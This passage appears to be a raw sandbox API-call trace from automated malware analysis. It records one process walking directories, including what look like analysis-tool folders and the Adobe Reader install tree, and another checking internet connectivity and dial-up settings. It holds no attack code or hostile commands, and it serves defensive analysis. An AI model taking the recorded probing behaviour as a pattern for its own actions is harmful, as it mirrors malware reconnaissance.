FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xbfq\x1ab\xaf\x91\xcf\x01\x10\x99@rX\x94\xcf\x01\x10\x99@rX\x94\xcf\x01\x10\x99@rX\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arx\x00\x00\x00\x00\x00\x00\x00\xbfq\x1ab\xaf\x91\xcf\x01\xb0\x8a=rX\x94\xcf\x01\xbfq\x1ab\xaf\x91\xcf\x01\xbfq\x1ab\xaf\x91\xcf\x01m\x04\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00i\x00s\x00g\x00u\x00i\x00s\x00e\x00.\x00p\x00y\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\xb0\x8a=rX\x94\xcf\x01\xb0\x8a=rX\x94\xcf\x01\xb0\x8a=rX\x94\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:57,337 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:57,337 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:57,417 | 504 | FindFirstFileExW |
FileName => C:\jxqdezuqds\modules\packages\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:57,417 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xef\xf8\x1bb\xaf\x91\xcf\x01p4+rX\x94\xcf\x01p4+rX\x94\xcf\x01p4+rX\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arp\x00\x00\x00\x00\x00\x00\x00\x0f$%b\xaf\x91\xcf\x01?\xab&b\xaf\x91\xcf\x01?\xab&b\xaf\x91\xcf\x01?\xab&b\xaf\x91\xcf\x01F\x04\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00p\x00p\x00l\x00e\x00t\x00.\x00p\x00y\x00p\x00\x00\x00\x00\x00\x00\x00\xcf@+b\xaf\x91\xcf\x01\xcf@+b\xaf\x91\xcf\x01\xcf@+b\xaf\x91\xcf\x01\xcf@+b\xaf\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:57,417 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:57,417 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:57,417 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000174 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:57,417 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:57,497 | 504 | FindFirstFileExW |
FileName => C:\mXTrEAuG\*.* |
SUCCESS | 0x0016f390 | |
| 07:44:57,497 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000174 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xdf\x00Ic\xaf\x91\xcf\x01\xdf\x00Ic\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00h\x00\x00\x00\x00\x00\x00\x00\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00r\x00o\x00p\x00y\x00h\x00\x00\x00\x00\x00\x00\x00\xdf\x00Ic\xaf\x91\xcf\x01\xdf\x00Ic\xaf\x91\xcf\x01\xdf\x00Ic\xaf\x91\xcf\x01\xdf\x00Ic\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:57,497 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:57,577 | 504 | FindFirstFileExW |
FileName => C:\mXTrEAuG\drop\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:57,577 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:57,577 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:57,577 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:57,657 | 504 | FindFirstFileExW |
FileName => C:\mXTrEAuG\files\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:57,657 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xdf\x00Ic\xaf\x91\xcf\x01\xdf\x00Ic\xaf\x91\xcf\x01\xdf\x00Ic\xaf\x91\xcf\x01\xdf\x00Ic\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:57,657 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:57,657 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:57,888 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:57,888 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:57,888 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x0016cdd8 | |
| 07:44:57,888 | 1308 | OpenServiceW |
ServiceControlManager => 0x0016cdd8 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x0016f2b0 | |
| 07:44:57,888 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:57,888 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:57,888 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:57,888 | 504 | FindFirstFileExW |
FileName => C:\mXTrEAuG\logs\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:57,888 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:57,888 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:57,888 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:57,978 | 504 | FindFirstFileExW |
FileName => C:\mXTrEAuG\memory\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:57,978 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:57,978 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:57,978 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:58,058 | 504 | FindFirstFileExW |
FileName => C:\mXTrEAuG\shots\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:58,058 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x0f\x88Jc\xaf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:58,058 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:58,058 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000174 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:58,058 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:58,138 | 504 | FindFirstFileExW |
FileName => C:\Program Files\*.* |
SUCCESS | 0x0016f390 | |
| 07:44:58,138 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000174 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\x83b>oI\xcd\x01\x9f\x9e~P\xaf\x91\xcf\x01\xa0\xe8J\xb9\xe6\x91\xcf\x01\xa0\xe8J\xb9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00h\x00\x00\x00\x00\x00\x00\x00\xa0\xe8J\xb9\xe6\x91\xcf\x01\xb0\xa9\xb7\xe4\xe6\x91\xcf\x01\xa0\xe8J\xb9\xe6\x91\xcf\x01\xa0\xe8J\xb9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00d\x00o\x00b\x00e\x00x\x00\x00\x00\x00\x00\x00\x00\xe0\x83b>oI\xcd\x01\xb0\x94i(\xf2\x91\xcf\x01paI\xb9\xe6\x91\xcf\x01paI\xb9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:58,138 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:58,218 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\*.* |
SUCCESS | 0x0016e590 | |
| 07:44:58,218 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xe8J\xb9\xe6\x91\xcf\x01\xb0\xa9\xb7\xe4\xe6\x91\xcf\x01\xa0\xe8J\xb9\xe6\x91\xcf\x01\xa0\xe8J\xb9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00B\x009\x00R\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xe8J\xb9\xe6\x91\xcf\x01\xc0a\xa85\xf2\x91\xcf\x01 D\xc7\xcd\xe6\x91\xcf\x01 D\xc7\xcd\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x14\x00R\x00E\x00A\x00D\x00E\x00R\x00~\x001\x00.\x000\x00\x00\x00\x00\x00R\x00e\x00a\x00d\x00e\x00r\x00 \x001\x001\x00.\x000\x00 |
SUCCESS | 0x00000000 | |
| 07:44:58,218 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:58,298 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:58,298 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xe8J\xb9\xe6\x91\xcf\x01\xc0a\xa85\xf2\x91\xcf\x01 D\xc7\xcd\xe6\x91\xcf\x01 D\xc7\xcd\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arh\x00\x00\x00\x00\x00\x00\x00\xf0\xbc\xc5\xcd\xe6\x91\xcf\x01P\xcb\xc8\xcd\xe6\x91\xcf\x01P\xcb\xc8\xcd\xe6\x91\xcf\x01P\xcb\xc8\xcd\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00E\x00s\x00l\x00l\x00e\x00p\x00\x00\x00\x00\x00\x00\x000~O\xb9\xe6\x91\xcf\x01\xa0\xa9\xb75\xf2\x91\xcf\x01\xb0%g\xda\xe6\x91\xcf\x01\xb0%g\xda\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:58,298 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:58,378 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Esl\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:58,378 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xbc\xc5\xcd\xe6\x91\xcf\x01P\xcb\xc8\xcd\xe6\x91\xcf\x01P\xcb\xc8\xcd\xe6\x91\xcf\x01P\xcb\xc8\xcd\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x00\x00\x00\x00\x00\x00\x00\x00\x00T`A\xc4j\xcf\x01P\xcb\xc8\xcd\xe6\x91\xcf\x01\x00T`A\xc4j\xcf\x01P\xcb\xc8\xcd\xe6\x91\xcf\x01xI\x03\x00\x00\x00\x00\x00\x00P\x03\x00\x00\x00\x00\x00 \x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00i\x00o\x00d\x00L\x00i\x00t\x00e\x00.\x00d\x00l\x00l\x00 |
SUCCESS | 0x00000000 | |
| 07:44:58,378 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:58,378 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:58,459 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:58,459 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x000~O\xb9\xe6\x91\xcf\x01\xa0\xa9\xb75\xf2\x91\xcf\x01\xb0%g\xda\xe6\x91\xcf\x01\xb0%g\xda\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MICx\x00\x00\x00\x00\x00\x00\x00\x00F9:\xc4j\xcf\x01@%z\xcc\xe6\x91\xcf\x01\x00F9:\xc4j\xcf\x01@%z\xcc\xe6\x91\xcf\x01x\xfd\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00 \x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x003\x00D\x00U\x00t\x00i\x00l\x00s\x00.\x00d\x00l\x00l\x00t\x00p\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01\xb0Y\x92\xc1\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:58,459 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:58,539 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:58,539 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xfaq\xc7\xe6\x91\xcf\x01\x805M\xc9\xe6\x91\xcf\x01@\xa7\x85\xcb\xe6\x91\xcf\x01@\xa7\x85\xcb\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00c\x00r\x00o\x00x\x00\x00\x00\x00\x00\x00\x00\x00\x10\xfb.\xeej\xcf\x01\x80\xc24\xc9\xe6\x91\xcf\x01\x00\x10\xfb.\xeej\xcf\x01\x80\xc24\xc9\xe6\x91\xcf\x01x{\x10\x00\x00\x00\x00\x00\x00\x80\x10\x00\x00\x00\x00\x00 \x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00c\x00r\x00o\x00E\x00x\x00t\x00.\x00e\x00x\x00e\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\x00\xe3\xc9-\xeej\xcf\x01\xa0\xed=\xc9\xe6\x91\xcf\x01\x00\xe3\xc9-\xeej\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:58,539 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:58,619 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\locales\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:58,619 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\xa7\x85\xcb\xe6\x91\xcf\x01@\xa7\x85\xcb\xe6\x91\xcf\x01@\xa7\x85\xcb\xe6\x91\xcf\x01@\xa7\x85\xcb\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00i\x00m\x00e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89g+\xeej\xcf\x01@\xa7\x85\xcb\xe6\x91\xcf\x01\x00\x89g+\xeej\xcf\x01@\xa7\x85\xcb\xe6\x91\xcf\x012\x19\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00n\x00-\x00U\x00S\x00.\x00p\x00a\x00k\x00 |
SUCCESS | 0x00000000 | |
| 07:44:58,619 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:58,619 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:58,619 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:58,689 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:58,689 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:58,689 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:58,689 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:58,689 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:58,699 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\AIR\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:58,699 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xd6\x94\xcd\xe6\x91\xcf\x01P\xe5\x97\xcd\xe6\x91\xcf\x01P\xe5\x97\xcd\xe6\x91\xcf\x01P\xe5\x97\xcd\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00c\x00r\x00o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00F9:\xc4j\xcf\x01P\xe5\x97\xcd\xe6\x91\xcf\x01\x00F9:\xc4j\xcf\x01P\xe5\x97\xcd\xe6\x91\xcf\x01xy\x03\x00\x00\x00\x00\x00\x00\x80\x03\x00\x00\x00\x00\x00 \x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00n\x00p\x00p\x00d\x00f\x003\x002\x00.\x00d\x00l\x00l\x00 |
SUCCESS | 0x00000000 | |
| 07:44:58,699 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:58,699 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:58,779 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\Browser\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:58,779 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\x05Q\xb9\xe6\x91\xcf\x01\x90;\xaa\xcd\xe6\x91\xcf\x01\x90;\xaa\xcd\xe6\x91\xcf\x01\x90;\xaa\xcd\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00c\x00r\x00o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x089\xc4j\xcf\x01\x90;\xaa\xcd\xe6\x91\xcf\x01\x00\x19\x089\xc4j\xcf\x01\x90;\xaa\xcd\xe6\x91\xcf\x01xy\x03\x00\x00\x00\x00\x00\x00\x80\x03\x00\x00\x00\x00\x00 \x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00n\x00p\x00p\x00d\x00f\x003\x002\x00.\x00d\x00l\x00l\x00 |
SUCCESS | 0x00000000 | |
| 07:44:58,779 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:58,779 | 504 | NtQueryDirectoryFile |
